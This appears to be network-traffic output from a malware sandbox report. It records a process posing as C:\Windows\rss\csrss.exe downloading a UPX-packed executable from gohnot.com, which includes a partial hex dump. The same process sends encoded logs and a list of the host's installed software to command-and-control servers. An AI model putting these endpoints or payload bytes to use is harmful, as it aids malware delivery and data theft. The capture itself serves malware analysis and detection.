Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49747	172.67.207.136	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49748	172.67.139.144	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49750	172.67.139.144	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49752	104.21.34.203	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49807	172.67.139.144	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49751	172.67.196.11	80	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data
Nov 11, 2021 20:35:48.952845097 CET	1231	OUT	GET /546468561c5f48a95f3eb178d8283c2e/watchdog.exe HTTP/1.1 Host: gohnot.com User-Agent: Go-http-client/1.1 Uuid: 3633e481-2f88-4842-b7ba-c5d7e0cc011f Version: 183 Accept-Encoding: gzip
Nov 11, 2021 20:35:48.993185043 CET	1232	IN	HTTP/1.1 200 OK Date: Thu, 11 Nov 2021 19:35:48 GMT Content-Type: application/octet-stream Content-Length: 2102272 Connection: keep-alive content-disposition: attachment; filename=watchdog.exe etag: "616ea494-201400" last-modified: Tue, 19 Oct 2021 10:57:24 GMT Cache-Control: max-age=3600 CF-Cache-Status: HIT Age: 2147 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IZbZWdjamI%2BOlW6zrBCfymBq%2F3EM7AYENiKBU5VEfeBk8QwcSprlzIdARZfp9OhwkDRq0Hl79ZYMAk3bYiIZL5RRTbInTH8PueogXJMbnQaAbXXgXKMt2qHIOXr8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 6ac9f742f94b4e19-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 00 00 00 00 00 b4 4b 00 00 00 00 00 e0 00 03 03 0b 01 03 00 00 10 20 00 00 10 00 00 00 70 2d 00 00 8d 4d 00 00 80 2d 00 00 90 4d 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 a0 4d 00 00 10 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 4d 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 70 2d 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 10 20 00 00 80 2d 00 00 10 20 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 90 4d 00 00 02 00 00 00 12 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELK p-M-M@MMUPX0p-UPX1 - @UPX2M @
Nov 11, 2021 20:35:48.993232965 CET	1234	IN	Data Raw: 00 c0 33 2e 39 35 00 55 50 58 21 0d 09 08 09 59 97 50 98 0e ef ba a0 1e 64 4d 00 e9 0c 20 00 00 b6 4b 00 26 27 00 ab ff ff ff ff ff 20 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 38 4c 67 64 4e 77 31 30 4f 4d 6e 6a 6e 45 61 66 ff ff 6f ff 6f 75 6f Data Ascii: 3.95UPX!YPdM K&' Go build ID: "8LgdNw10OMnjnEafoouob/F_u>d7bw5LzGyMt067q/f_4En-IIykrT4Xu-NukD/RUnzYHIbGfj1LuaRla" d;av 'D$$`k&fdnlL$hmg$
Nov 11, 2021 20:35:48.993280888 CET	1235	IN	Data Raw: c1 57 72 50 84 1b b4 07 0c a9 08 71 3f 90 7d de 6c e4 a9 20 1b f8 1b 21 df ad c0 e2 ca 88 15 bb fa 01 45 e5 1b 02 8f 10 2c 27 e6 95 4d 43 db 5d 39 d9 18 20 bb 9c 8b e2 a9 2b 74 90 61 97 52 a9 04 39 28 20 64 b1 3b 7a f8 08 aa b4 f3 57 8d 3d 35 39 Data Ascii: WrPq?}l !E,'MC]9 +taR9( d;zW=59ky,.@yi-(8HXh:xI.>!$2erxHj!pTq60#.?WD8kmNq_VN]SY?.7
Nov 11, 2021 20:35:48.993354082 CET	1237	IN	Data Raw: bf 42 a2 88 a0 57 c9 0f 2e c1 75 06 0f 8b 86 02 97 f6 1f 1a 2e c0 75 02 7b 5b 6a 05 80 dd 13 76 df 41 40 18 8b 88 90 11 90 94 e4 90 17 89 fb ff 5f f5 cb c1 e1 11 e4 89 d3 31 ca c1 e9 07 31 d1 89 da c1 eb 10 31 cb 89 98 45 c1 ff 37 b8 8d 04 1a 4d Data Ascii: BW.u.u{[jvA@_111E7M15ivEbxVsAuF&(fQ2f<c'9({'~7-E!2r5X*>- tgIfY^I t)1wxMeY!(@QN
Nov 11, 2021 20:35:48.993401051 CET	1238	IN	Data Raw: c1 a8 d6 44 6d 1a 60 3e 6c 8d 1f c2 2d 70 2a 0b 02 8a ac 64 ab 33 3e 1e 66 67 70 a0 8b 4f f0 72 e4 ad 40 7f 5e 23 01 7e 30 b8 97 20 ed 79 ef 40 76 23 0e 4c 30 87 d1 47 e6 13 60 7f 40 ae 1c 83 c0 ac b0 02 66 2a 0a f0 14 b9 e8 a8 44 9d e5 54 2b 82 Data Ascii: Dm`>l-pd3>fgpOr@^#~0 y@v#L0G`@fDT+o0BqGt4;=&:%HId,fQlba0RlLp)-pKhxp$BA9M49L{^pA,}b?1DI'\8"?v>ehxAxv
Nov 11, 2021 20:35:48.993448973 CET	1239	IN	Data Raw: 4d a8 ca 28 a6 e9 13 ae 78 fc a1 40 44 e8 09 83 c3 0c a4 52 fd 8b 7b fd 4b e0 1b fa 17 77 2d 8b 3f b4 01 fd 39 fa 76 1d fc ff 1f e8 f0 28 ce 29 fd 29 fa 39 e9 76 09 46 29 e9 39 c6 7c cd eb a8 8c 8b 83 1f 37 d7 eb df 0c 38 18 20 05 ff bd 19 c7 4c Data Ascii: M(x@DR{Kw-?9v())9vF)9\|78 L`0\|4<$lCuL$)80@&)4D<-z80.btQL_a%I=z?[H,y@c$70i?Y(6-pTY8Y7>lEzP89Pf{
Nov 11, 2021 20:35:48.993493080 CET	1241	IN	Data Raw: 49 38 85 a3 c2 00 d5 20 13 62 24 46 f8 05 01 bc ee ff be 02 23 d8 df f8 20 89 5c 24 04 14 32 32 c1 df 20 10 b0 92 b2 62 be 19 02 2b 23 0c 80 06 19 f1 32 f5 0b 5c 31 49 14 1c f5 af cf 6e 81 84 46 10 bb df eb 11 90 70 16 17 2c 60 26 51 58 90 01 59 Data Ascii: I8 b$F# \$22 b+#2\1InFp,`&QXYM9Q!uSP`GCJ#i`DF@'O[EJBBJKP07pl!A#?A(#:tx^G\2Dp%B*X3GZH
Nov 11, 2021 20:35:48.993542910 CET	1242	IN	Data Raw: e9 7e 76 f4 3c 2e 32 3d 97 74 28 31 ff 97 ff 0b de 14 72 0e d8 8d 45 01 68 77 74 29 c1 89 ca f7 d9 c1 f9 06 d2 3b f8 1f 21 c8 01 f0 30 34 9e 38 97 57 c0 41 4e f1 a0 22 34 60 20 58 01 03 f3 5c 21 bc 6a 7f 6c 05 46 c6 7c 24 10 16 1c 60 2a 87 14 e1 Data Ascii: ~v<.2=t(1rEhwt);!048WAN"4` X\!jlF\|$`$)ZYq!+E\|4tE_q_/]Kj hB9sG4V8?(ArZw ArkZ GX+\P ;A\F1$",V3<hX
Nov 11, 2021 20:35:48.993587017 CET	1243	IN	Data Raw: 94 cb 6c b8 e0 01 94 16 a3 a0 5a 89 c2 ad a4 5e d1 9b 3d ea eb f1 89 f8 e3 d3 88 07 9c 0d b9 08 4f 27 4d 5e 87 2a 8d ac df 93 07 9f ff f7 00 bc 78 f0 7c 3e 5f 1c 8b 48 08 81 f9 6d 54 1a 6c ff 88 ae b3 3e e9 72 f9 8c 02 25 79 16 29 02 f1 57 36 af Data Ascii: lZ^=O'M^x\|>_HmTl>r%y)W6.=j+E9'O"ku\VR>IJbVm>p kt=FB3hy?(hFSx;?Y\|%Ux$: \GWx?PrO#I
Nov 11, 2021 20:35:48.993638039 CET	1245	IN	Data Raw: 0a 6f 76 c7 47 b3 47 6f 5b e2 b7 b5 d6 76 c5 0f 2c 10 00 3b 14 02 bd 49 38 46 1d 47 54 75 45 89 47 a3 23 f3 af fa 3c 8e 03 f0 fc 8d 74 24 34 19 f0 d6 54 42 68 3d 44 1e 5c 7c 31 06 dc d4 64 89 4c 55 85 b0 02 32 32 3e 85 db d9 48 45 b4 ff 74 83 c4 Data Ascii: ovGGo[v,;I8FGTuEG#<t$4TBh=D\\|1dLU22>HEt\O8f06pWdhwjlptF[/C +U(KLmq'0'tp(#'I07E\|(,3Wl/LT_AJGgR_K@~d
Nov 11, 2021 20:35:48.993690014 CET	1246	IN	Data Raw: 0f 84 d5 0a 5a 12 ed 09 e8 12 77 d4 d8 44 7d 57 25 46 89 dc 2d fb 1f 03 1f 70 80 25 44 0f b6 12 f6 c2 01 1e 81 7b 9c 52 3f 8f 75 09 99 8c 48 19 7e ec 66 2b f3 44 01 08 8b 57 02 9b 01 9c 9d 85 8c 71 90 49 d8 e3 06 db c3 71 01 07 84 c2 26 c0 84 f0 Data Ascii: ZwD}W%F-p%D{R?uH~f+DWqIq&PciQi8pD3J02,\aHDJ# p_ DT.P<?8tfXg,\wg9t1i1OCTC5=2
Nov 11, 2021 20:36:19.168078899 CET	3450	OUT	Data Raw: 00 Data Ascii:
Nov 11, 2021 20:36:49.201649904 CET	10509	OUT	Data Raw: 00 Data Ascii:

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49743	172.67.207.136	443	C:\Windows\rss\csrss.exe

Timestamp	Direction	Data
2021-11-11 19:35:29 UTC	OUT	POST /api/log HTTP/1.1 Host: runmodes.com User-Agent: Go-http-client/1.1 Content-Length: 144 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip
2021-11-11 19:35:29 UTC	OUT	Data Raw: 58 53 38 2b 62 47 54 56 32 4f 4d 54 59 63 64 68 77 44 2b 76 62 30 4c 65 51 58 75 45 4e 4b 6b 4d 33 6a 4b 57 70 70 32 79 77 34 6c 6e 5a 72 67 52 47 33 6a 33 33 34 55 32 77 61 38 6c 57 6a 71 70 51 71 74 68 59 45 69 38 36 32 4f 5a 33 6e 6d 5a 54 39 52 67 4c 4f 33 4a 39 35 4c 58 75 43 6e 5a 34 4d 32 43 71 4e 71 5a 66 65 65 35 43 61 72 48 77 57 31 45 4a 58 44 2b 53 49 4d 4f 77 70 42 56 71 54 54 4d 54 78 76 4c 61 6e 51 53 74 6e 69 51 Data Ascii: XS8+bGTV2OMTYcdhwD+vb0LeQXuENKkM3jKWpp2yw4lnZrgRG3j334U2wa8lWjqpQqthYEi862OZ3nmZT9RgLO3J95LXuCnZ4M2CqNqZfee5CarHwW1EJXD+SIMOwpBVqTTMTxvLanQStniQ
2021-11-11 19:35:29 UTC	IN	HTTP/1.1 200 OK Date: Thu, 11 Nov 2021 19:35:29 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M%2BzkfO2zQl9Rdrp42SwPbpTyMUmU5X1HcjmNSubNb6kxjAE%2BKcVqnc409%2F5H7ON9JN%2FtWNxiddTNYtQTbyKFp7gQl5bAfDYGnSoW2bQN%2F0pSJrEDZG%2FufL2bpHyHRiA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6ac9f6c99be3dfdb-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49746	172.67.139.144	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-11 19:35:29 UTC	0	OUT	POST /bots/post-ia-data?uuid=3633e481-2f88-4842-b7ba-c5d7e0cc011f HTTP/1.1 Host: server3.trumops.com User-Agent: Go-http-client/1.1 Content-Length: 18950 Content-Type: application/json; charset=UTF-8 Accept-Encoding: gzip
2021-11-11 19:35:29 UTC	1	OUT	Data Raw: 5b 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 32 30 31 33 20 78 36 34 20 4d 69 6e 69 6d 75 6d 20 52 75 6e 74 69 6d 65 20 2d 20 31 32 2e 30 2e 32 31 30 30 35 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 32 2e 30 2e 32 31 30 30 35 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 31 39 30 36 32 37 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 37 35 35 38 30 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b Data Ascii: [{"display_name":"Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005","display_version":"12.0.21005","install_date":"20190627"},{"display_name":"Update for Microsoft Office 2016 (KB4475580) 32-Bit Edition","display_version":"","install_date":""},{
2021-11-11 19:35:29 UTC	2	OUT	Data Raw: 65 20 2d 20 31 34 2e 32 31 2e 32 37 37 30 32 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 34 2e 32 31 2e 32 37 37 30 32 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 31 39 30 36 32 37 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 50 75 62 6c 69 73 68 65 72 20 4d 55 49 20 28 45 6e 67 6c 69 73 68 29 20 32 30 31 36 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 36 2e 30 2e 34 32 36 36 2e 31 30 30 31 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 32 30 30 37 32 33 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 32 30 31 39 20 58 36 34 20 41 64 64 69 74 69 6f 6e 61 6c 20 52 75 Data Ascii: e - 14.21.27702","display_version":"14.21.27702","install_date":"20190627"},{"display_name":"Microsoft Publisher MUI (English) 2016","display_version":"16.0.4266.1001","install_date":"20200723"},{"display_name":"Microsoft Visual C++ 2019 X64 Additional Ru
2021-11-11 19:35:29 UTC	4	OUT	Data Raw: 66 6f 72 20 42 75 73 69 6e 65 73 73 20 32 30 31 36 20 28 4b 42 34 34 38 34 32 38 36 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4f 75 74 69 6c 73 20 64 65 20 76 c3 a9 72 69 66 69 63 61 74 69 6f 6e 20 6c 69 6e 67 75 69 73 74 69 71 75 65 20 32 30 31 36 20 64 65 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 c2 a0 2d 20 46 72 61 6e c3 a7 61 69 73 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 36 2e 30 2e 34 32 36 36 2e 31 30 30 31 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 32 30 30 37 32 33 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 Data Ascii: for Business 2016 (KB4484286) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Outils de vrification linguistique 2016 de Microsoft Office- Franais","display_version":"16.0.4266.1001","install_date":"20200723"},{"display_name
2021-11-11 19:35:29 UTC	4	OUT	Data Raw: 45 6e 67 6c 69 73 68 29 20 32 30 31 36 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 36 2e 30 2e 34 32 36 36 2e 31 30 30 31 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 32 30 30 37 32 33 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 32 30 31 35 2d 32 30 31 39 20 52 65 64 69 73 74 72 69 62 75 74 61 62 6c 65 20 28 78 38 36 29 20 2d 20 31 34 2e 32 31 2e 32 37 37 30 32 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 34 2e 32 31 2e 32 37 37 30 32 2e 32 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 Data Ascii: English) 2016","display_version":"16.0.4266.1001","install_date":"20200723"},{"display_name":"Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702","display_version":"14.21.27702.2","install_date":""},{"display_name":"Security Update for Mic
2021-11-11 19:35:29 UTC	8	OUT	Data Raw: 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 31 36 20 28 4b 42 34 34 38 34 32 37 33 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 38 34 32 34 38 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 Data Ascii: ":"Security Update for Microsoft Excel 2016 (KB4484273) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Update for Microsoft Office 2016 (KB4484248) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Security
2021-11-11 19:35:29 UTC	12	OUT	Data Raw: 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 49 6e 66 6f 50 61 74 68 20 4d 55 49 20 28 45 6e 67 6c 69 73 68 29 20 32 30 31 36 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 36 2e 30 2e 34 32 36 36 2e 31 30 30 31 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 32 30 30 37 32 33 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 49 45 34 44 61 74 61 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 Data Ascii: Edition","display_version":"","install_date":""},{"display_name":"Microsoft InfoPath MUI (English) 2016","display_version":"16.0.4266.1001","install_date":"20200723"},{"display_name":"IE4Data","display_version":"","install_date":""},{"display_name":"Secur
2021-11-11 19:35:29 UTC	16	OUT	Data Raw: 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 30 31 31 35 37 34 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 38 34 31 30 36 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 Data Ascii: splay_version":"","install_date":""},{"display_name":"Security Update for Microsoft Office 2016 (KB4011574) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Update for Microsoft Office 2016 (KB4484106) 32-Bit Edition","display_vers
2021-11-11 19:35:29 UTC	19	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Nov 2021 19:35:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-powered-by: PHP/8.0.11 CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vGS1xEh6LbXXdYk%2FUfHE3K9XHXOXdwE2lHJOtvHYtcyT5%2B9kHA7Kf8RkH5w6ASVjA0fcvzY3WJWPHRIBYbMyJfOmx%2B%2B35yaFyw7TA7MtjOV6VQ0xWJeJ4Ed3IWRwWuyLAm82%2ByYm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6ac9f6ca9af1e660-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-11-11 19:35:29 UTC	20	IN	Data Raw: 34 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 39 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 Data Ascii: 4a8<!DOCTYPE html><html><head> <meta charset="utf-8" /> <title>Not Found (#404)</title> <style> body { font: normal 9pt "Verdana"; color: #000; background: #fff; } h1 {
2021-11-11 19:35:29 UTC	21	IN	Data Raw: 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 70 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 61 61 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a Data Ascii: pt "Verdana"; color: #000; } .version { color: gray; font-size: 8pt; border-top: 1px solid #aaa; padding-top: 1em; margin-bottom: 1em; } </style></head>
2021-11-11 19:35:29 UTC	21	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49747	172.67.207.136	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-11 19:35:33 UTC	21	OUT	POST /api/log HTTP/1.1 Host: runmodes.com User-Agent: Go-http-client/1.1 Content-Length: 132 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip
2021-11-11 19:35:33 UTC	21	OUT	Data Raw: 46 34 35 4a 44 49 46 33 48 5a 66 61 47 6a 77 6b 4f 64 73 64 61 43 64 57 63 63 35 6a 59 31 4e 54 48 6d 50 49 5a 63 73 49 4b 4a 76 4f 6b 56 4e 53 53 7a 31 7a 63 42 55 4e 65 2f 42 45 4d 71 74 6c 68 74 52 6c 4f 66 77 4d 46 58 65 2f 4e 36 71 46 48 4e 34 7a 55 45 58 33 44 52 6e 2f 73 69 68 4e 5a 36 53 4a 63 2b 75 67 58 48 46 49 46 30 78 79 6b 69 55 7a 4b 73 55 43 55 4d 65 4c 37 32 31 4d 68 41 3d 3d Data Ascii: F45JDIF3HZfaGjwkOdsdaCdWcc5jY1NTHmPIZcsIKJvOkVNSSz1zcBUNe/BEMqtlhtRlOfwMFXe/N6qFHN4zUEX3DRn/sihNZ6SJc+ugXHFIF0xykiUzKsUCUMeL721MhA==
